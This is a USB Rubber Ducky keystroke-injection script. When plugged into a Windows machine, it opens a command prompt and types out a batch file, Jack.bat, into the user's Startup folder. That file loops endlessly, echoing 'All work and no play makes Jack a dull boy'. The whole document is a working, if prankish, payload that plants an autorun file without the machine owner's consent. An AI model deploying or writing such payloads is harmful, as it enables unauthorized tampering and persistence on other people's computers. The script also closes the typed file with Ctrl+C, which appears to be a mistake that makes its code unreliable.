REM Open the command line You dont need admin because you are only adding to the Users Startup Directory

DELAY 3000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500

REM start making Jack.bat 

STRING copy con "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jack.bat"
ENTER
DELAY 500
STRING @ECHO OFF
ENTER
STRING COLOR 02
ENTER
STRING :START
ENTER
STRING ECHO A
ENTER
STRING ECHO AL
ENTER
STRING ECHO ALL
ENTER
STRING ECHO ALL W
ENTER
STRING ECHO ALL WO
ENTER
STRING ECHO ALL WOR
ENTER
STRING ECHO ALL WORK
ENTER
STRING ECHO ALL WORK A
ENTER
STRING ECHO ALL WORK AN
ENTER
STRING ECHO ALL WORK AND N
ENTER
STRING ECHO ALL WORK AND NO 
ENTER
STRING ECHO ALL WORK AND NO P
ENTER
STRING ECHO ALL WORK AND NO PL
ENTER
STRING ECHO ALL WORK AND NO PLA
ENTER
STRING ECHO ALL WORK AND NO PLAY 
ENTER
STRING ECHO ALL WORK AND NO PLAY M
ENTER
STRING ECHO ALL WORK AND NO PLAY MA
ENTER
STRING ECHO ALL WORK AND NO PLAY MAK
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKE
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES J
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JA
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JAC
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK 
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A D
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DU
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DUL
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL 
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL B
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL BO
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL BOY
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL BOY
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL BOY
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL BOY
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL BOY
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL BOY
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL BOY
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL BOY
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL BOY
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL BOY
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL BOY
ENTER
STRING ECHO ALL WORK AND NO PLAY MAKES JACK A DULL BOY
ENTER
STRING GOTO START
ENTER
CTRL c
STRING exit
ENTER
